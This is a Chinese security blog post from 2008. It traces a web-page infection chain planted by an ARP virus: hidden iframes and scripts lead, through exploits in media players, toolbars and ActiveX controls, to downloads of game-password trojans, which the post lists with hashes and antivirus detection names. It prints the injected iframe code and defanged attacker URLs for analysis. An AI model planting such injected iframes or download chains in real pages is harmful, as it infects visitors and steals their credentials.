ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等

最新推荐文章于 2022-05-02 22:14:59 发布
最新推荐文章于 2022-05-02 22:14:59 发布
阅读量2k 收藏
点赞数
分类专栏: 系统安全 文章标签: iframe border xsl c 游戏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/2124546
版权

ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等

endurer 原创
2008-02-26 第1

该病毒会向所网页加入代码:
/---
<iframe src=hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM width=0 height=0></iframe>
---/

1 hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM
包含代码:
/---
<iframe src=hxxp://www.i**mm**m*qm.***.cn/h.htm width=0 height=0></iframe>
<iframe src=hxxp://d*m*.1**7ti**ng**gIeba*.cn/c2.htm width=0 height=0></iframe>
<iframe src=hxxp://a**d*.1**02**4.mo*.cn/10wip.htm></iframe>
---/

1.1 hxxp://www.i**mm**m*qm.***.cn/h.htm 包含代码:
/---
<iframe src=hxxp://0**867*5.se*r**vice-google.***.cn/vip/Cn3100.htm?bb?6 width=0 height=0></iframe>
---/

1.1.1 hxxp://0**867*5.se*r**vice-google.***.cn/vip/Cn3100.htm?bb?6 包含并输出代码:
/---
<iframe src=wm2/index.html width=1 height=1 border=1></iframe>
<iframe style=display:none src="2.gif"></iframe>
<iframe style=display:none src="8.gif"></iframe>
<iframe style=display:none src="1.gif"></iframe>
<iframe style=display:none src="5.gif"></iframe>
<iframe style=display:none src="11.gif"></iframe>
<iframe style=display:none src="4.gif"></iframe>
<iframe style=display:none src="12.gif" width=100 height=1></iframe>
<iframe style=display:none src="2.gif"></iframe>
---/

1.1.1.1.1 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/1.gif

利用暴风影音漏洞下载hxxp://20**08*02*03.se*r**vice-google.***.cn/bf.exe
文件说明符 : D:/test/bf.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-26 20:37:50
修改时间 : 2008-2-26 20:37:50
访问时间 : 2008-2-26 20:38:47
大小 : 7368 字节 7.200 KB
MD5 : 194872cfd1ab7a9f7bf2c7fc27997c02
SHA1: 5CB01436D73551E0C60775A7049870BCB9FEC91C
CRC32: 7c458325
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.ppu,瑞星报为 Trojan.PSW.Win32.OnlineGames.GEN

1.1.1.1.2 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/2.gif
利用ms0614漏洞 下载 hxxp://20**08*02*21.se*r**vice-google.***.cn/614.exe
614.exe 与 bf.exe 相同。

1.1.1.1.3 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/3.gif

利用 Qvod Player插件 漏洞下载 hxxp://20**08*02*03.se*r**vice-google.***.cn/qvod.exe
qvod.exe与bf.exe相同

1.1.1.1.4 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/4.gif

利用BaiduBar.Tool 下载 hxxp://20**08*02*21.se*r**vice-google.***.cn/x.cab
x.cab中的 x.exe 与 bf.exe相同。

1.1.1.1.5 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/5.gif

利用ppstream漏洞下载 hxxp://20**08*02*03.se*r**vice-google.***.cn/pps.exe
pps.exe与 bf.exe相同。

1.1.1.1.6 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/6.gif 包含代码:
/---
<iframe src=hxxp://20**08*02*21.se*r**vice-google.***.cn/vip/ok_ok.htm width=0 height=0 border=0></iframe>
---/

1.1.1.1.6.1 hxxp://20**08*02*21.se*r**vice-google.***.cn/vip/ok_ok.htm 包含代码:
/---
<iframe src=wm2/z.html width=1 height=1 border=0></iframe>
---/

1.1.1.1.6.1.1 hxxp://20**08*02*21.se*r**vice-google.***.cn/vip/wm2/z.html
内容同 1.1.1

1.1.1.1.7 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/7.gif
同6.gif

1.1.1.1.8 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/8.gif

利用realplayer漏洞下载hxxp://20**08*02*03.se*r**vice-google.***.cn/real.exe
real.exe 与 6.gif 相同。

1.1.1.1.9 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/9.gif
同6.gif

1.1.1.1.10 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/10.gif
同6.gif

1.1.1.1.11 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/11.gif

利用联众世界GLChat.ocx 漏洞下载 hxxp://20**08*02*03.se*r**vice-google.***.cn/lz3.exe
lz3.exe 与 bf.exe相同。

1.1.1.1.12 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/12.gif

利用迅雷漏洞下载hxxp://20**08*02*24.se*r**vice-google.***.cn/xl.exe

xl.exe 与 bf.exe相同。

1.1.1.1.13 hxxp://0**867*5.se*r**vice-google.***.cn/vip/wm2/13.gif
同6.gif

1.2 hxxp://d*m*.1**7ti**ng**gIeba*.cn/c2.htm 包含代码:
/---
<iframe src=hxxp://vvv.m**p1**15**67.com/web/6664301.htm?id=xsl width=100 height=0></iframe>
---/

1.2.1 hxxp://vvv.m**p1**15**67.com/web/6664301.htm?id=xsl 包含代码:
/---
<iframe src=htm.html width=100 height=0></iframe>
---/

1.2.1.1 hxxp://vvv.m**p1**15**67.com/web/htm.html 包含并输出代码:
/---
<iframe width=100 height=0 src=hxxp://vvv.m**p1**15**67.com/web/rl.htm></iframe>
<script src=hxxp://vvv.m**p1**15**67.com/web/1.js></script>
<script src=hxxp://vvv.m**p1**15**67.com/web/bf.js></script>
<script src=hxxp://vvv.m**p1**15**67.com/web/pps.js></script>
<iframe width='10'height='10'src='hxxp://vvv.m**p1**15**67.com/web/3.htm'></iframe>
---/

1.2.1.1.1 hxxp://vvv.m**p1**15**67.com/web/rl.htm

利用 Realplayer漏洞下载 hxxp://exe.x*in**nia*nk*l.com/rl.exe

文件说明符 : D:/test/rl.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-26 20:55:38
修改时间 : 2008-2-26 20:55:38
访问时间 : 2008-2-26 20:56:21
大小 : 23717 字节 23.165 KB
MD5 : bfaf373042d10517fdc0fe713bbeb093
SHA1: AD5E17BD40A7604EA3FDA5A35B372FBB5BA7DF2E
CRC32: b6ea58c4

Kaspersky 报为 Trojan-Downloader.Win32.Delf.epw》NSPack,瑞星报为 Trojan.DL.Win32.Direct.me》IFTDLL

1.2.1.1.2 hxxp://vvv.m**p1**15**67.com/web/1.js

利用 MS0614漏洞下载 hxxp://exe.x*in**nia*nk*l.com/014.exe
014.exe 与 rl.exe相同。

1.2.1.1.3 hxxp://vvv.m**p1**15**67.com/web/bf.js

利用暴风影音漏洞下载hxxp://exe.x*in**nia*nk*l.com/bf.exe
bf.exe 与 rl.exe相同。

1.2.1.1.4 hxxp://vvv.m**p1**15**67.com/web/pps.js

利用pps漏洞下载hxxp://exe.x*in**nia*nk*l.com/pps.exe
pps.exe 与 rl.exe相同。


1.2.1.1.5 利用 BaiduBar.Tool 下载 hxxp://exe.x*in**nia*nk*l.com/ad.cab
ad.cab 包含的 bd.exe 与 rl.exe相同。

1.2.1.1.6 hxxp://vvv.m**p1**15**67.com/web/3.htm

利用联众世界的游戏大厅主程序GLWorld的ActiveX控件(HanGamePluginCn18.dll,CLSID:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://exe.x*in**nia*nk*l.com/lz.exe

lz.exe 与 rl.exe相同。

1.3 hxxp://a**d*.1**02**4.mo*.cn/10wip.htm 包含代码:
/---
<iframe src="hxxp://www.**5**9*.vc/page/add_753643.htm?111222222" width=0 height=0></iframe>
---/

1.3.1 hxxp://www.**5**9*.vc/page/add_753643.htm?111222222 包含代码:
/---
<script src=addr.js></script>
---/

1.3.1.1 hxxp://www.**5**9*.vc/page/addr.js
其中的代码比较独特,会检测浏览者的电脑中是否安装有Kaspersky InternetSecurity6.0。

输出代码:
/---
<iframe style=display:none src="hxxp://***.w**1*8***.vg/baidu.gif"></iframe>
<iframe style=display:none src="hxxp://***.w**1*8***.vg/bf.gif"></iframe>
<iframe style=display:none src="hxxp://***.w**1*8***.vg/ms.gif"></iframe>
<iframe style=display:none src="hxxp://***.w**1*8***.vg/real.gif"></iframe>
<iframe style=display:none src="hxxp://***.w**1*8***.vg/lz.gif"></iframe>
<iframe style=display:none src="hxxp://***.w**1*8***.vg/xl.gif"></iframe>
<iframe style=display:none src="hxxp://***.w**1*8***.vg/ms.gif"></iframe>
---/

1.3.1.1.1 hxxp://***.w**1*8***.vg/baidu.gif

利用 BaiduBar.Tool.1 下载 hxxp://***.w**1*8***.vg/calc.cab
calc.cab 包含 s.exe

文件说明符 : D:/test/s.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-9 23:34:34
修改时间 : 2008-2-9 23:34:34
访问时间 : 2008-2-26 21:2:9
大小 : 1444 字节 1.420 KB
MD5 : 1b27b0c37f725a140955de91c58e2266
SHA1: 95FE224A524EF3C0BBCF5494DDEF5E86B3926DB3
CRC32: 2c2ce980

Kaspersky 报为 Trojan-Downloader.Win32.Tiny.aid,瑞星报为Trojan.DL.Win32.Inject.rjm》upack0.39

1.3.1.1.2 hxxp://***.w**1*8***.vg/bf.gif
文件不存在

1.3.1.1.3 hxxp://***.w**1*8***.vg/ms.gif
利用MS 0614漏洞 下载 hxxp://***.w**1*8***.vg/s.exe

1.3.1.1.4 hxxp://***.w**1*8***.vg/real.gif
利用RealPlayer漏洞 下载 hxxp://***.w**1*8***.vg/s.exe


1.3.1.1.5 hxxp://***.w**1*8***.vg/lz.gif
利用联众世界GLChat.ocx(clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69,_licensed_to_="huyufeng";)漏洞下载:hxxp://***.w**1*8***.vg/s.exe

1.3.1.1.6 hxxp://***.w**1*8***.vg/xl.gif
利用迅雷看看(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F,_licensed_to_="huyufeng";)漏洞下载:hxxp://***.w**1*8***.vg/s.exe

 
紫郢剑侠
关注
专栏目录
挂载system.img android linux,Android系统System.img逆向工程
weixin_39560604的博客
05-22 1019
目的Android Rom打包后,根据类型,粗略分为固件包和普通卡刷包;不管是固件包(如:三星Odin固件包),还是卡刷包(如:GSI通刷包)。为了操作方便,有时会打包成system.img格式。现在就带大家在Linux上挂载system.img。得到镜像文件以三星固件包为例,其他手机品牌可以参考:Github 解包开源项目我解压的是SM-A505U_1_20191216162802(美版三星A5...
遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
gdfyug的博客
02-18 713
遭遇Trojan-Spy Win32 Delf uv Trojan PSW Win32 XYOnline Trojan
国内资深安全专家详谈Trojan-PSW盗号***
weixin_34324081的博客
05-04 3596
诚信网安--子明【51CTO.com 专家特稿】近日在QQ上广泛传播地一段回答问题得到q币中奖消息中所包含的恶意链接,访问该链接将导致用户电脑感染多种***程序,经过仔细分析这些***几乎都归于一类——Trojan-PSW***! 一、Trojan-PSW***的定义 近年来,网络犯罪和破坏更趋向于能够给***者带来直接或间接的经济利益,像之前对纯技术的追求已经不那么明...
蓝桥杯| 备赛练习题+知识点合集
zzzlueng的博客
04-08 9万+
文章目录[知识点] 两个数的最小公倍数&最大公因数[判断一个数是否为素数][2017真题]k倍区间[2020填空]路径[2017填空] :纸牌三角形[2020 七段码][2018]字母阵列[2015填空]三羊献瑞逗志芃的危机幸运的店家礼物 算法常见的考点和刷题记录 [知识点] 两个数的最小公倍数&最大公因数 约分法: a*b = (这两个数的最大公因数)* (这两个数的最小公倍数) 假设a=18,b=30,要求最小公倍数。 最大公因数: 6 最小公倍数:90 a*b=540 可以看到18
遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马
Purpleendurer@CSDN
12-10 2381
endurer 原创2006-12-10 第1版一位网友的电脑最近工作比较慢,让偶帮忙检修看看。到 http://endurer.ys168.com 下载 HijackThis 和 ProcView。先用 HijackThis 扫描 log,发现以下可疑项: /-------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (W
最新JavaScript笔试题(含答案)
u010227447的专栏
05-14 1万+
1 判断字符串是否是这样组成的,第一个必须是字母,后面可以是字母、数字、下划线,总长度为5-20var reg = ^[a-zA-Z][a-zA-Z_0-9]{4,19}$ ;reg test("a1a__a1a__a1a__a1a__");复制代码2 截取字符串abcde 1. 判断字符串是否是这样组成的,第一个必须是字母,后面可以是字母、数字、下划线,总长度为5-20
Trojan-Downloader.Win32.Generic.a...
06-08
病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
最新发布
09-21
标题中的"osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed"揭示了这个压缩包文件包含的是一种针对多个平台的蠕虫木马病毒,特别是针对Windows 32位系统、Linux以及Mac OS。关键词“Cross-Platform...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
如何杀除Trojan.win32.Thsys病毒
job82824的专栏
03-25 5760
本人这几天深受其害,但是最后还是终于摆脱了这个可恶的病毒的骚扰。 这个病毒像牛皮糖一样,用360/360急救箱/木马克星之类的都不能彻底杀除,因为它的传染能力较强。 其实所有的蠕虫病毒都有个共性,就是善于感染硬盘中的.dll文件和.exe文件,你发觉它的存在越晚,那它感染的文件就会越多。 以前我用这种方法对付过威金蠕虫--就是将硬盘中的所有.dll和.exe文件都搜索出来,
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
LAMP+NFS实现多个web服务器静态资源统一存储
weixin_33701617的博客
12-25 235
需求分析:1.前端需支持更大的访问量,单台Web服务器已无法满足需求了,则需扩容Web服务器;2.虽然动态内容可交由后端的PHP服务器执行,但静态页面还需要Web服务器自己解析,那是否意味着多台Web服务器都需要在各自的系统中都存有一份静态页面数据呢? 其实这样也不是不可以,毕竟文件本地访问,速度还是有优势的,但这却涉及到多台Web服务器间内容的一致性问题,这种问题也不可...
MD5密算法
delete_bug的博客
05-02 1323
密算法是指通过md5工具将密码转换成16进制的字符串,一共32位长度 接下来的代码主要涉及四种密方式: 1 自定义密解密 2 普通md5密 3,md5 密 4 文件密,文件密还是比较靠谱的,不容易被密码撞库破解 package com.daybreak.util; import java.io.File; import java.io.FileInputStream; import java.security.MessageDigest; import java.security.NoS
滑动窗口系列-Leetcode 567. 字符串的排列
MD
05-08 193
文章目录问题描述解题报告实现代码参考资料 问题描述 给定两个字符串 s1 和 s2,写一个函数来判断 s2 是否包含 s1 的排列。 换句话说,第一个字符串的排列之一是第二个字符串的子串。 示例1: 输入: s1 = “ab” s2 = “eidbaooo” 输出: True 解释: s2 包含 s1 的排列之一 (“ba”). 解题报告 本题代码框架与滑动窗口系列-Leetcode 76. 最小覆盖子串非常相似,不解释。 实现代码 class Solution { public: // 判断 s
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗2
Purpleendurer@CSDN
04-15 1777
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗2endurer 原创2008-04-15 第1版(续1)开始修复~到 http://purpleendurer.ys168.com下载bat_do和FileInfo并运行,到 http://tool.kaka.com 下载安装瑞星卡卡安全助手并运行,扫描出4个流氓软件,清除它们,接着切换到[高级
ARP病毒自动传播Trojan.PSW.Win32.OnlineGames的代码
Purpleendurer@CSDN
07-31 1895
ARP病毒自动传播Trojan.PSW.Win32.OnlineGames的代码endurer 原创2007-07-31 第1版前两天,一位网友反映他最近打开网页显示都是乱码。让他把网页源代码传过来分析,发现网页首部被入代码:/---<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>---/hxxp
JAVASE入门基础知识整理笔记篇(十四)
weixin_44963337的博客
05-13 107
线程 1.线程的开启方式–三种 2.线程的状态 --五种 3.锁同步 4.线程通信 多线程:多任务同时执行就是多线程,如果没有任务,就不需要使用多线程 线程和进程之间的区别: 进程:资源分配的最小单位 线程:cpu调度的最小单位 一个进程可以包含1~n个线程 开启线程的第三种方式: 1.继承Thread类,重写run()方法 创建子类对象,调用start()方法,开启多线程 2.实现R...
Trojan.Win32.VB.atg病毒分析与查杀指南
"本文详细解析了Trojan.Win32.VB.atg病毒,这是一种伪装成Excel图标,实则为恶意EXE可执行程序的病毒。它会自我复制到系统关键目录,并通过多种方式进行传播,同时修改系统设置以维持其活动状态。" Trojan.Win32.VB...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值